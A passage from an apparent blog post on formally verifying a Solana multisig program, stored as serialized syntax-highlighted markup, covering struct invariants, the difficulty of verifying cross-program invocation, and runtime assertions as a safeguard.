is_member",{"type":26,"tag":137,"props":30199,"children":30200},{"style":5601},[30201],{"type":32,"value":165},{"type":26,"tag":137,"props":30203,"children":30204},{"style":5590},[30205],{"type":32,"value":5694},{"type":26,"tag":137,"props":30207,"children":30208},{"style":5573},[30209],{"type":32,"value":16304},{"type":26,"tag":137,"props":30211,"children":30212},{"style":5601},[30213],{"type":32,"value":1108},{"type":26,"tag":137,"props":30215,"children":30216},{"style":5584},[30217],{"type":32,"value":29861},{"type":26,"tag":137,"props":30219,"children":30220},{"style":5590},[30221],{"type":32,"value":7072},{"type":26,"tag":137,"props":30223,"children":30224},{"style":6009},[30225],{"type":32,"value":23450},{"type":26,"tag":137,"props":30227,"children":30228},{"style":5601},[30229],{"type":32,"value":5671},{"type":26,"tag":137,"props":30231,"children":30232},{"style":5590},[30233],{"type":32,"value":16348},{"type":26,"tag":137,"props":30235,"children":30236},{"style":6009},[30237],{"type":32,"value":30238}," Option",{"type":26,"tag":137,"props":30240,"children":30241},{"style":5601},[30242],{"type":32,"value":8391},{"type":26,"tag":137,"props":30244,"children":30245},{"style":6009},[30246],{"type":32,"value":19194},{"type":26,"tag":137,"props":30248,"children":30249},{"style":5601},[30250],{"type":32,"value":9865},{"type":26,"tag":137,"props":30252,"children":30253},{"class":5559,"line":5412},[30254,30258,30262,30266,30270,30274,30278,30282,30286,30290],{"type":26,"tag":137,"props":30255,"children":30256},{"style":5610},[30257],{"type":32,"value":17344},{"type":26,"tag":137,"props":30259,"children":30260},{"style":5573},[30261],{"type":32,"value":16388},{"type":26,"tag":137,"props":30263,"children":30264},{"style":5590},[30265],{"type":32,"value":470},{"type":26,"tag":137,"props":30267,"children":30268},{"style":5601},[30269],{"type":32,"value":23576},{"type":26,"tag":137,"props":30271,"children":30272},{"style":5590},[30273],{"type":32,"value":470},{"type":26,"tag":137,"props":30275,"children":30276},{"style":5682},[30277],{"type":32,"value":30158},{"type":26,"tag":137,"props":30279,"children":30280},{"style":5601},[30281],{"type":32,"value":165},{"type":26,"tag":137,"props":30283,"children":30284},{"style":5590},[30285],{"type":32,"value":5694},{"type":26,"tag":137,"props":30287,"children":30288},{"style":5584},[30289],{"type":32,"value":29861},{"type":26,"tag":137,"props":30291,"children":30292},{"style":5601},[30293],{"type":32,"value":17395},{"type":26,"tag":137,"props":30295,"children":30296},{"class":5559,"line":5417},[30297,30301,30305,30309,30313,30317,30321,30325,30329],{"type":26,"tag":137,"props":30298,"children":30299},{"style":6009},[30300],{"type":32,"value":17403},{"type":26,"tag":137,"props":30302,"children":30303},{"style":5601},[30304],{"type":32,"value":165},{"type":26,"tag":137,"props":30306,"children":30307},{"style":5584},[30308],{"type":32,"value":29911},{"type":26,"tag":137,"props":30310,"children":30311},{"style":5601},[30312],{"type":32,"value":5671},{"type":26,"tag":137,"props":30314,"children":30315},{"style":5590},[30316],{"type":32,"value":17413},{"type":26,"tag":137,"props":30318,"children":30319},{"style":6009},[30320],{"type":32,"value":29902},{"type":26,"tag":137,"props":30322,"children":30323},{"style":5601},[30324],{"type":32,"value":165},{"type":26,"tag":137,"props":30326,"children":30327},{"style":5584},[30328],{"type":32,"value":29911},{"type":26,"tag":137,"props":30330,"children":30331},{"style":5601},[30332],{"type":32,"value":9320},{"type":26,"tag":137,"props":30334,"children":30335},{"class":5559,"line":5642},[30336,30341,30346,30351],{"type":26,"tag":137,"props":30337,"children":30338},{"style":5584},[30339],{"type":32,"value":30340},"        _",{"type":26,"tag":137,"props":30342,"children":30343},{"style":5590},[30344],{"type":32,"value":30345}," =>",{"type":26,"tag":137,"props":30347,"children":30348},{"style":6009},[30349],{"type":32,"value":30350}," None",{"type":26,"tag":137,"props":30352,"children":30353},{"style":5601},[30354],{"type":32,"value":6099},{"type":26,"tag":137,"props":30356,"children":30357},{"class":5559,"line":5745},[30358],{"type":26,"tag":137,"props":30359,"children":30360},{"style":5601},[30361],{"type":32,"value":5945},{"type":26,"tag":137,"props":30363,"children":30364},{"class":5559,"line":5850},[30365],{"type":26,"tag":137,"props":30366,"children":30367},{"style":5601},[30368],{"type":32,"value":6507},{"type":26,"tag":35,"props":30370,"children":30371},{},[30372,30374,30379,30381,30386,30388,30393,30395,30400],{"type":32,"value":30373},"So interestingly, a ",{"type":26,"tag":130,"props":30375,"children":30377},{"className":30376},[],[30378],{"type":32,"value":23576},{"type":32,"value":30380}," vec of size 0 ",{"type":26,"tag":762,"props":30382,"children":30383},{},[30384],{"type":32,"value":30385},"is actually",{"type":32,"value":30387}," a sufficient condition to execute ",{"type":26,"tag":130,"props":30389,"children":30391},{"className":30390},[],[30392],{"type":32,"value":28058},{"type":32,"value":30394},". However would it ever actually happen? Well we know from before that when we create the multisig, the threshold must be less than or equal to the number of keys and also greater than zero. So in any ",{"type":26,"tag":762,"props":30396,"children":30397},{},[30398],{"type":32,"value":30399},"valid",{"type":32,"value":30401}," multisig, the number of keys should never be zero.",{"type":26,"tag":35,"props":30403,"children":30404},{},[30405,30407,30412],{"type":32,"value":30406},"We can represent this ",{"type":26,"tag":762,"props":30408,"children":30409},{},[30410],{"type":32,"value":30411},"validity",{"type":32,"value":30413}," with a struct invariant. In fact the invariant we defined earlier will be sufficient:",{"type":26,"tag":5512,"props":30415,"children":30417},{"code":30416,"language":5551,"meta":7,"className":5552,"style":7},"#[invariant(\n    (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms { ... }\n",[30418],{"type":26,"tag":130,"props":30419,"children":30420},{"__ignoreMap":7},[30421,30428,30451,30502,30509],{"type":26,"tag":137,"props":30422,"children":30423},{"class":5559,"line":5560},[30424],{"type":26,"tag":137,"props":30425,"children":30426},{"style":5601},[30427],{"type":32,"value":23371},{"type":26,"tag":137,"props":30429,"children":30430},{"class":5559,"line":5412},[30431,30435,30439,30443,30447],{"type":26,"tag":137,"props":30432,"children":30433},{"style":5601},[30434],{"type":32,"value":27321},{"type":26,"tag":137,"props":30436,"children":30437},{"style":5590},[30438],{"type":32,"value":470},{"type":26,"tag":137,"props":30440,"children":30441},{"style":5601},[30442],{"type":32,"value":23664},{"type":26,"tag":137,"props":30444,"children":30445},{"style":5590},[30446],{"type":32,"value":12533},{"type":26,"tag":137,"props":30448,"children":30449},{"style":5601},[30450],{"type":32,"value":23673},{"type":26,"tag":137,"props":30452,"children":30453},{"class":5559,"line":5417},[30454,30458,30462,30466,30470,30474,30478,30482,30486,30490,30494,30498],{"type":26,"tag":137,"props":30455,"children":30456},{"style":5590},[30457],{"type":32,"value":18213},{"type":26,"tag":137,"props":30459,"children":30460},{"style":5601},[30461],{"type":32,"value":23597},{"type":26,"tag":137,"props":30463,"children":30464},{"style":5590},[30465],{"type":32,"value":470},{"type":26,"tag":137,"props":30467,"children":30468},{"style":5601},[30469],{"type":32,"value":23664},{"type":26,"tag":137,"props":30471,"children":30472},{"style":5573},[30473],{"type":32,"value":11428},{"type":26,"tag":137,"props":30475,"children":30476},{"style":6009},[30477],{"type":32,"value":16322},{"type":26,"tag":137,"props":30479,"children":30480},{"style":5590},[30481],{"type":32,"value":10782},{"type":26,"tag":137,"props":30483,"children":30484},{"style":5601},[30485],{"type":32,"value":16388},{"type":26,"tag":137,"props":30487,"children":30488},{"style":5590},[30489],{"type":32,"value":470},{"type":26,"tag":137,"props":30491,"children":30492},{"style":5601},[30493],{"type":32,"value":23576},{"type":26,"tag":137,"props":30495,"children":30496},{"style":5590},[30497],{"type":32,"value":470},{"type":26,"tag":137,"props":30499,"children":30500},{"style":5601},[30501],{"type":32,"value":23725},{"type":26,"tag":137,"props":30503,"children":30504},{"class":5559,"line":5642},[30505],{"type":26,"tag":137,"props":30506,"children":30507},{"style":5601},[30508],{"type":32,"value":22852},{"type":26,"tag":137,"props":30510,"children":30511},{"class":5559,"line":5745},[30512,30516,30520,30524,30528,30532],{"type":26,"tag":137,"props":30513,"children":30514},{"style":5573},[30515],{"type":32,"value":16281},{"type":26,"tag":137,"props":30517,"children":30518},{"style":5573},[30519],{"type":32,"value":23744},{"type":26,"tag":137,"props":30521,"children":30522},{"style":6009},[30523],{"type":32,"value":23749},{"type":26,"tag":137,"props":30525,"children":30526},{"style":5601},[30527],{"type":32,"value":12175},{"type":26,"tag":137,"props":30529,"children":30530},{"style":5590},[30531],{"type":32,"value":12180},{"type":26,"tag":137,"props":30533,"children":30534},{"style":5601},[30535],{"type":32,"value":12185},{"type":26,"tag":35,"props":30537,"children":30538},{},[30539,30541,30547,30549,30555],{"type":32,"value":30540},"The use of a struct invariant allows us to define (and verify) the possible states that an account can be in at the start and end of an instruction. In this case, our struct invariant rules out the case where ",{"type":26,"tag":130,"props":30542,"children":30544},{"className":30543},[],[30545],{"type":32,"value":30546},"keys.len() == 0",{"type":32,"value":30548}," and allows us to prove the biconditional ",{"type":26,"tag":130,"props":30550,"children":30552},{"className":30551},[],[30553],{"type":32,"value":30554},"(keys.len() >= 1) -> (instruction succeeds)",{"type":32,"value":470},{"type":26,"tag":118,"props":30557,"children":30559},{"id":30558},"safety-guarantees",[30560],{"type":32,"value":25364},{"type":26,"tag":35,"props":30562,"children":30563},{},[30564],{"type":32,"value":30565},"Formal verification is an awesome technique but it is not perfect. There are situations where things are not possible to formally verify and you need to resort to other methods.",{"type":26,"tag":35,"props":30567,"children":30568},{},[30569],{"type":32,"value":30570},"In particular, one of the difficult-to-verify parts of the Squads Multisig program is cross-program-invocation. Specifically, since cross-program-invocation executes foreign code, it is difficult (if not impossible) to verify whether this will succeed or fail.",{"type":26,"tag":35,"props":30572,"children":30573},{},[30574,30576,30582],{"type":32,"value":30575},"In the multisig program this happens in the ",{"type":26,"tag":130,"props":30577,"children":30579},{"className":30578},[],[30580],{"type":32,"value":30581},"execute_transaction",{"type":32,"value":30583}," instruction.",{"type":26,"tag":35,"props":30585,"children":30586},{},[30587],{"type":26,"tag":762,"props":30588,"children":30589},{},[30590],{"type":32,"value":30591},"So what do you do?",{"type":26,"tag":35,"props":30593,"children":30594},{},[30595],{"type":32,"value":30596},"For example, in a worst-case scenario you could imagine a situation like the following:",{"type":26,"tag":5512,"props":30598,"children":30600},{"code":30599,"language":5551,"meta":7,"className":5552,"style":7},"#[derive(Accounts)]\npub MyCtx {\n    #[account(mut)]\n    pub my_account: Account\u003C'info, Acc>\n}\n\n#[account]\n#[invariant(bad == false)]\nstruct Acc {\n    pub bad: bool\n}\n\nimpl Acc {\n    pub fn put_into_bad_state() {\n        self.bad = true;\n    }\n}\n\n// Instruction handler:\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n    invoke_signed(...); // Cross-program invocation\n\n    let invoke_res = ...; // fetch result of invocation\n    if invoke_res == 5 {\n        ctx.my_account.put_into_bad_state(); // corrupt our account\n    }\n    Ok(())\n}\n",[30601],{"type":26,"tag":130,"props":30602,"children":30603},{"__ignoreMap":7},[30604,30619,30635,30650,30691,30698,30705,30712,30729,30745,30766,30773,30780,30796,30816,30844,30851,30858,30865,30873,30926,30952,30959,30988,31012,31047,31054,31065],{"type":26,"tag":137,"props":30605,"children":30606},{"class":5559,"line":5560},[30607,30611,30615],{"type":26,"tag":137,"props":30608,"children":30609},{"style":5601},[30610],{"type":32,"value":25417},{"type":26,"tag":137,"props":30612,"children":30613},{"style":6009},[30614],{"type":32,"value":25422},{"type":26,"tag":137,"props":30616,"children":30617},{"style":5601},[30618],{"type":32,"value":22852},{"type":26,"tag":137,"props":30620,"children":30621},{"class":5559,"line":5412},[30622,30626,30631],{"type":26,"tag":137,"props":30623,"children":30624},{"style":5573},[30625],{"type":32,"value":16281},{"type":26,"tag":137,"props":30627,"children":30628},{"style":6009},[30629],{"type":32,"value":30630}," MyCtx",{"type":26,"tag":137,"props":30632,"children":30633},{"style":5601},[30634],{"type":32,"value":5875},{"type":26,"tag":137,"props":30636,"children":30637},{"class":5559,"line":5417},[30638,30642,30646],{"type":26,"tag":137,"props":30639,"children":30640},{"style":5601},[30641],{"type":32,"value":25709},{"type":26,"tag":137,"props":30643,"children":30644},{"style":5573},[30645],{"type":32,"value":6325},{"type":26,"tag":137,"props":30647,"children":30648},{"style":5601},[30649],{"type":32,"value":22852},{"type":26,"tag":137,"props":30651,"children":30652},{"class":5559,"line":5642},[30653,30657,30662,30666,30670,30674,30678,30682,30687],{"type":26,"tag":137,"props":30654,"children":30655},{"style":5573},[30656],{"type":32,"value":23436},{"type":26,"tag":137,"props":30658,"children":30659},{"style":5584},[30660],{"type":32,"value":30661}," my_account",{"type":26,"tag":137,"props":30663,"children":30664},{"style":5590},[30665],{"type":32,"value":7072},{"type":26,"tag":137,"props":30667,"children":30668},{"style":6009},[30669],{"type":32,"value":25674},{"type":26,"tag":137,"props":30671,"children":30672},{"style":5601},[30673],{"type":32,"value":25502},{"type":26,"tag":137,"props":30675,"children":30676},{"style":6009},[30677],{"type":32,"value":25507},{"type":26,"tag":137,"props":30679,"children":30680},{"style":5601},[30681],{"type":32,"value":1108},{"type":26,"tag":137,"props":30683,"children":30684},{"style":6009},[30685],{"type":32,"value":30686},"Acc",{"type":26,"tag":137,"props":30688,"children":30689},{"style":5601},[30690],{"type":32,"value":8577},{"type":26,"tag":137,"props":30692,"children":30693},{"class":5559,"line":5745},[30694],{"type":26,"tag":137,"props":30695,"children":30696},{"style":5601},[30697],{"type":32,"value":6507},{"type":26,"tag":137,"props":30699,"children":30700},{"class":5559,"line":5850},[30701],{"type":26,"tag":137,"props":30702,"children":30703},{"emptyLinePlaceholder":18},[30704],{"type":32,"value":6276},{"type":26,"tag":137,"props":30706,"children":30707},{"class":5559,"line":5878},[30708],{"type":26,"tag":137,"props":30709,"children":30710},{"style":5601},[30711],{"type":32,"value":23363},{"type":26,"tag":137,"props":30713,"children":30714},{"class":5559,"line":5891},[30715,30720,30724],{"type":26,"tag":137,"props":30716,"children":30717},{"style":5601},[30718],{"type":32,"value":30719},"#[invariant(bad ",{"type":26,"tag":137,"props":30721,"children":30722},{"style":5590},[30723],{"type":32,"value":11161},{"type":26,"tag":137,"props":30725,"children":30726},{"style":5601},[30727],{"type":32,"value":30728}," false)]\n",{"type":26,"tag":137,"props":30730,"children":30731},{"class":5559,"line":5909},[30732,30736,30741],{"type":26,"tag":137,"props":30733,"children":30734},{"style":5573},[30735],{"type":32,"value":11990},{"type":26,"tag":137,"props":30737,"children":30738},{"style":6009},[30739],{"type":32,"value":30740}," Acc",{"type":26,"tag":137,"props":30742,"children":30743},{"style":5601},[30744],{"type":32,"value":5875},{"type":26,"tag":137,"props":30746,"children":30747},{"class":5559,"line":5930},[30748,30752,30757,30761],{"type":26,"tag":137,"props":30749,"children":30750},{"style":5573},[30751],{"type":32,"value":23436},{"type":26,"tag":137,"props":30753,"children":30754},{"style":5584},[30755],{"type":32,"value":30756}," bad",{"type":26,"tag":137,"props":30758,"children":30759},{"style":5590},[30760],{"type":32,"value":7072},{"type":26,"tag":137,"props":30762,"children":30763},{"style":6009},[30764],{"type":32,"value":30765}," bool\n",{"type":26,"tag":137,"props":30767,"children":30768},{"class":5559,"line":5939},[30769],{"type":26,"tag":137,"props":30770,"children":30771},{"style":5601},[30772],{"type":32,"value":6507},{"type":26,"tag":137,"props":30774,"children":30775},{"class":5559,"line":6191},[30776],{"type":26,"tag":137,"props":30777,"children":30778},{"emptyLinePlaceholder":18},[30779],{"type":32,"value":6276},{"type":26,"tag":137,"props":30781,"children":30782},{"class":5559,"line":6208},[30783,30788,30792],{"type":26,"tag":137,"props":30784,"children":30785},{"style":5573},[30786],{"type":32,"value":30787},"impl",{"type":26,"tag":137,"props":30789,"children":30790},{"style":6009},[30791],{"type":32,"value":30740},{"type":26,"tag":137,"props":30793,"children":30794},{"style":5601},[30795],{"type":32,"value":5875},{"type":26,"tag":137,"props":30797,"children":30798},{"class":5559,"line":6225},[30799,30803,30807,30812],{"type":26,"tag":137,"props":30800,"children":30801},{"style":5573},[30802],{"type":32,"value":23436},{"type":26,"tag":137,"props":30804,"children":30805},{"style":5573},[30806],{"type":32,"value":16286},{"type":26,"tag":137,"props":30808,"children":30809},{"style":5682},[30810],{"type":32,"value":30811}," put_into_bad_state",{"type":26,"tag":137,"props":30813,"children":30814},{"style":5601},[30815],{"type":32,"value":18328},{"type":26,"tag":137,"props":30817,"children":30818},{"class":5559,"line":6238},[30819,30823,30827,30832,30836,30840],{"type":26,"tag":137,"props":30820,"children":30821},{"style":5573},[30822],{"type":32,"value":29952},{"type":26,"tag":137,"props":30824,"children":30825},{"style":5590},[30826],{"type":32,"value":470},{"type":26,"tag":137,"props":30828,"children":30829},{"style":5601},[30830],{"type":32,"value":30831},"bad ",{"type":26,"tag":137,"props":30833,"children":30834},{"style":5590},[30835],{"type":32,"value":289},{"type":26,"tag":137,"props":30837,"children":30838},{"style":5573},[30839],{"type":32,"value":15060},{"type":26,"tag":137,"props":30841,"children":30842},{"style":5601},[30843],{"type":32,"value":5604},{"type":26,"tag":137,"props":30845,"children":30846},{"class":5559,"line":6247},[30847],{"type":26,"tag":137,"props":30848,"children":30849},{"style":5601},[30850],{"type":32,"value":5945},{"type":26,"tag":137,"props":30852,"children":30853},{"class":5559,"line":6270},[30854],{"type":26,"tag":137,"props":30855,"children":30856},{"style":5601},[30857],{"type":32,"value":6507},{"type":26,"tag":137,"props":30859,"children":30860},{"class":5559,"line":6279},[30861],{"type":26,"tag":137,"props":30862,"children":30863},{"emptyLinePlaceholder":18},[30864],{"type":32,"value":6276},{"type":26,"tag":137,"props":30866,"children":30867},{"class":5559,"line":6288},[30868],{"type":26,"tag":137,"props":30869,"children":30870},{"style":5564},[30871],{"type":32,"value":30872},"// Instruction handler:\n",{"type":26,"tag":137,"props":30874,"children":30875},{"class":5559,"line":6355},[30876,30880,30885,30889,30893,30897,30901,30905,30910,30914,30918,30922],{"type":26,"tag":137,"props":30877,"children":30878},{"style":5573},[30879],{"type":32,"value":22860},{"type":26,"tag":137,"props":30881,"children":30882},{"style":5682},[30883],{"type":32,"value":30884}," hard_to_verify",{"type":26,"tag":137,"props":30886,"children":30887},{"style":5601},[30888],{"type":32,"value":165},{"type":26,"tag":137,"props":30890,"children":30891},{"style":5584},[30892],{"type":32,"value":22874},{"type":26,"tag":137,"props":30894,"children":30895},{"style":5590},[30896],{"type":32,"value":7072},{"type":26,"tag":137,"props":30898,"children":30899},{"style":6009},[30900],{"type":32,"value":22883},{"type":26,"tag":137,"props":30902,"children":30903},{"style":5601},[30904],{"type":32,"value":8391},{"type":26,"tag":137,"props":30906,"children":30907},{"style":6009},[30908],{"type":32,"value":30909},"MyCtx",{"type":26,"tag":137,"props":30911,"children":30912},{"style":5601},[30913],{"type":32,"value":23040},{"type":26,"tag":137,"props":30915,"children":30916},{"style":5590},[30917],{"type":32,"value":16348},{"type":26,"tag":137,"props":30919,"children":30920},{"style":6009},[30921],{"type":32,"value":16353},{"type":26,"tag":137,"props":30923,"children":30924},{"style":5601},[30925],{"type":32,"value":22925},{"type":26,"tag":137,"props":30927,"children":30928},{"class":5559,"line":6363},[30929,30934,30938,30942,30947],{"type":26,"tag":137,"props":30930,"children":30931},{"style":5682},[30932],{"type":32,"value":30933},"    invoke_signed",{"type":26,"tag":137,"props":30935,"children":30936},{"style":5601},[30937],{"type":32,"value":165},{"type":26,"tag":137,"props":30939,"children":30940},{"style":5590},[30941],{"type":32,"value":12180},{"type":26,"tag":137,"props":30943,"children":30944},{"style":5601},[30945],{"type":32,"value":30946},"); ",{"type":26,"tag":137,"props":30948,"children":30949},{"style":5564},[30950],{"type":32,"value":30951},"// Cross-program invocation\n",{"type":26,"tag":137,"props":30953,"children":30954},{"class":5559,"line":6393},[30955],{"type":26,"tag":137,"props":30956,"children":30957},{"emptyLinePlaceholder":18},[30958],{"type":32,"value":6276},{"type":26,"tag":137,"props":30960,"children":30961},{"class":5559,"line":6401},[30962,30966,30971,30975,30979,30983],{"type":26,"tag":137,"props":30963,"children":30964},{"style":5573},[30965],{"type":32,"value":5576},{"type":26,"tag":137,"props":30967,"children":30968},{"style":5584},[30969],{"type":32,"value":30970}," invoke_res",{"type":26,"tag":137,"props":30972,"children":30973},{"style":5590},[30974],{"type":32,"value":5593},{"type":26,"tag":137,"props":30976,"children":30977},{"style":5590},[30978],{"type":32,"value":27891},{"type":26,"tag":137,"props":30980,"children":30981},{"style":5601},[30982],{"type":32,"value":19820},{"type":26,"tag":137,"props":30984,"children":30985},{"style":5564},[30986],{"type":32,"value":30987},"// fetch result of invocation\n",{"type":26,"tag":137,"props":30989,"children":30990},{"class":5559,"line":6433},[30991,30995,30999,31003,31008],{"type":26,"tag":137,"props":30992,"children":30993},{"style":5610},[30994],{"type":32,"value":14870},{"type":26,"tag":137,"props":30996,"children":30997},{"style":5584},[30998],{"type":32,"value":30970},{"type":26,"tag":137,"props":31000,"children":31001},{"style":5590},[31002],{"type":32,"value":5866},{"type":26,"tag":137,"props":31004,"children":31005},{"style":5626},[31006],{"type":32,"value":31007}," 5",{"type":26,"tag":137,"props":31009,"children":31010},{"style":5601},[31011],{"type":32,"value":5875},{"type":26,"tag":137,"props":31013,"children":31014},{"class":5559,"line":6441},[31015,31019,31023,31028,31032,31037,31042],{"type":26,"tag":137,"props":31016,"children":31017},{"style":5584},[31018],{"type":32,"value":28778},{"type":26,"tag":137,"props":31020,"children":31021},{"style":5590},[31022],{"type":32,"value":470},{"type":26,"tag":137,"props":31024,"children":31025},{"style":5601},[31026],{"type":32,"value":31027},"my_account",{"type":26,"tag":137,"props":31029,"children":31030},{"style":5590},[31031],{"type":32,"value":470},{"type":26,"tag":137,"props":31033,"children":31034},{"style":5682},[31035],{"type":32,"value":31036},"put_into_bad_state",{"type":26,"tag":137,"props":31038,"children":31039},{"style":5601},[31040],{"type":32,"value":31041},"(); ",{"type":26,"tag":137,"props":31043,"children":31044},{"style":5564},[31045],{"type":32,"value":31046},"// corrupt our account\n",{"type":26,"tag":137,"props":31048,"children":31049},{"class":5559,"line":6501},[31050],{"type":26,"tag":137,"props":31051,"children":31052},{"style":5601},[31053],{"type":32,"value":5945},{"type":26,"tag":137,"props":31055,"children":31056},{"class":5559,"line":11634},[31057,31061],{"type":26,"tag":137,"props":31058,"children":31059},{"style":6009},[31060],{"type":32,"value":16924},{"type":26,"tag":137,"props":31062,"children":31063},{"style":5601},[31064],{"type":32,"value":16929},{"type":26,"tag":137,"props":31066,"children":31067},{"class":5559,"line":11652},[31068],{"type":26,"tag":137,"props":31069,"children":31070},{"style":5601},[31071],{"type":32,"value":6507},{"type":26,"tag":35,"props":31073,"children":31074},{},[31075,31077,31082],{"type":32,"value":31076},"The integrity of the verification framework relies on the fact that the account invariants for the accounts contained in the instruction (in this case ",{"type":26,"tag":130,"props":31078,"children":31080},{"className":31079},[],[31081],{"type":32,"value":31027},{"type":32,"value":31083},") will be maintained as long as the instruction succeeds.",{"type":26,"tag":35,"props":31085,"children":31086},{},[31087],{"type":32,"value":31088},"In this case, we can't really verify if the instruction succeeds or not (at least without knowing which program/instruction will be invoked).",{"type":26,"tag":35,"props":31090,"children":31091},{},[31092,31094,31099],{"type":32,"value":31093},"However, we can ",{"type":26,"tag":762,"props":31095,"children":31096},{},[31097],{"type":32,"value":31098},"augment",{"type":32,"value":31100}," our code with additional runtime constraints to ensure that the safety properties are preserved even if formal verification fails.",{"type":26,"tag":35,"props":31102,"children":31103},{},[31104],{"type":32,"value":31105},"In this case, we can add runtime assertions that ensure our runtime invariants hold. For example:",{"type":26,"tag":5512,"props":31107,"children":31109},{"code":31108,"language":5551,"meta":7,"className":5552,"style":7},"...\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n    invoke_signed(...); // Cross-program invocation\n\n    let invoke_res = ...; // fetch result of invocation\n    if invoke_res == 5 {\n        ctx.my_account.put_into_bad_state(); // corrupt our account\n    }\n\n    // Enforce invariants at runtime\n    assert(ctx.my_account.invariant());\n\n    Ok(())\n}\n",[31110],{"type":26,"tag":130,"props":31111,"children":31112},{"__ignoreMap":7},[31113,31121,31172,31195,31202,31229,31252,31283,31290,31297,31305,31340,31347,31358],{"type":26,"tag":137,"props":31114,"children":31115},{"class":5559,"line":5560},[31116],{"type":26,"tag":137,"props":31117,"children":31118},{"style":5590},[31119],{"type":32,"value":31120},"...\n",{"type":26,"tag":137,"props":31122,"children":31123},{"class":5559,"line":5412},[31124,31128,31132,31136,31140,31144,31148,31152,31156,31160,31164,31168],{"type":26,"tag":137,"props":31125,"children":31126},{"style":5573},[31127],{"type":32,"value":22860},{"type":26,"tag":137,"props":31129,"children":31130},{"style":5682},[31131],{"type":32,"value":30884},{"type":26,"tag":137,"props":31133,"children":31134},{"style":5601},[31135],{"type":32,"value":165},{"type":26,"tag":137,"props":31137,"children":31138},{"style":5584},[31139],{"type":32,"value":22874},{"type":26,"tag":137,"props":31141,"children":31142},{"style":5590},[31143],{"type":32,"value":7072},{"type":26,"tag":137,"props":31145,"children":31146},{"style":6009},[31147],{"type":32,"value":22883},{"type":26,"tag":137,"props":31149,"children":31150},{"style":5601},[31151],{"type":32,"value":8391},{"type":26,"tag":137,"props":31153,"children":31154},{"style":6009},[31155],{"type":32,"value":30909},{"type":26,"tag":137,"props":31157,"children":31158},{"style":5601},[31159],{"type":32,"value":23040},{"type":26,"tag":137,"props":31161,"children":31162},{"style":5590},[31163],{"type":32,"value":16348},{"type":26,"tag":137,"props":31165,"children":31166},{"style":6009},[31167],{"type":32,"value":16353},{"type":26,"tag":137,"props":31169,"children":31170},{"style":5601},[31171],{"type":32,"value":22925},{"type":26,"tag":137,"props":31173,"children":31174},{"class":5559,"line":5417},[31175,31179,31183,31187,31191],{"type":26,"tag":137,"props":31176,"children":31177},{"style":5682},[31178],{"type":32,"value":30933},{"type":26,"tag":137,"props":31180,"children":31181},{"style":5601},[31182],{"type":32,"value":165},{"type":26,"tag":137,"props":31184,"children":31185},{"style":5590},[31186],{"type":32,"value":12180},{"type":26,"tag":137,"props":31188,"children":31189},{"style":5601},[31190],{"type":32,"value":30946},{"type":26,"tag":137,"props":31192,"children":31193},{"style":5564},[31194],{"type":32,"value":30951},{"type":26,"tag":137,"props":31196,"children":31197},{"class":5559,"line":5642},[31198],{"type":26,"tag":137,"props":31199,"children":31200},{"emptyLinePlaceholder":18},[31201],{"type":32,"value":6276},{"type":26,"tag":137,"props":31203,"children":31204},{"class":5559,"line":5745},[31205,31209,31213,31217,31221,31225],{"type":26,"tag":137,"props":31206,"children":31207},{"style":5573},[31208],{"type":32,"value":5576},{"type":26,"tag":137,"props":31210,"children":31211},{"style":5584},[31212],{"type":32,"value":30970},{"type":26,"tag":137,"props":31214,"children":31215},{"style":5590},[31216],{"type":32,"value":5593},{"type":26,"tag":137,"props":31218,"children":31219},{"style":5590},[31220],{"type":32,"value":27891},{"type":26,"tag":137,"props":31222,"children":31223},{"style":5601},[31224],{"type":32,"value":19820},{"type":26,"tag":137,"props":31226,"children":31227},{"style":5564},[31228],{"type":32,"value":30987},{"type":26,"tag":137,"props":31230,"children":31231},{"class":5559,"line":5850},[31232,31236,31240,31244,31248],{"type":26,"tag":137,"props":31233,"children":31234},{"style":5610},[31235],{"type":32,"value":14870},{"type":26,"tag":137,"props":31237,"children":31238},{"style":5584},[31239],{"type":32,"value":30970},{"type":26,"tag":137,"props":31241,"children":31242},{"style":5590},[31243],{"type":32,"value":5866},{"type":26,"tag":137,"props":31245,"children":31246},{"style":5626},[31247],{"type":32,"value":31007},{"type":26,"tag":137,"props":31249,"children":31250},{"style":5601},[31251],{"type":32,"value":5875},{"type":26,"tag":137,"props":31253,"children":31254},{"class":5559,"line":5878},[31255,31259,31263,31267,31271,31275,31279],{"type":26,"tag":137,"props":31256,"children":31257},{"style":5584},[31258],{"type":32,"value":28778},{"type":26,"tag":137,"props":31260,"children":31261},{"style":5590},[31262],{"type":32,"value":470},{"type":26,"tag":137,"props":31264,"children":31265},{"style":5601},[31266],{"type":32,"value":31027},{"type":26,"tag":137,"props":31268,"children":31269},{"style":5590},[31270],{"type":32,"value":470},{"type":26,"tag":137,"props":31272,"children":31273},{"style":5682},[31274],{"type":32,"value":31036},{"type":26,"tag":137,"props":31276,"children":31277},{"style":5601},[31278],{"type":32,"value":31041},{"type":26,"tag":137,"props":31280,"children":31281},{"style":5564},[31282],{"type":32,"value":31046},{"type":26,"tag":137,"props":31284,"children":31285},{"class":5559,"line":5891},[31286],{"type":26,"tag":137,"props":31287,"children":31288},{"style":5601},[31289],{"type":32,"value":5945},{"type":26,"tag":137,"props":31291,"children":31292},{"class":5559,"line":5909},[31293],{"type":26,"tag":137,"props":31294,"children":31295},{"emptyLinePlaceholder":18},[31296],{"type":32,"value":6276},{"type":26,"tag":137,"props":31298,"children":31299},{"class":5559,"line":5930},[31300],{"type":26,"tag":137,"props":31301,"children":31302},{"style":5564},[31303],{"type":32,"value":31304},"    // Enforce invariants at 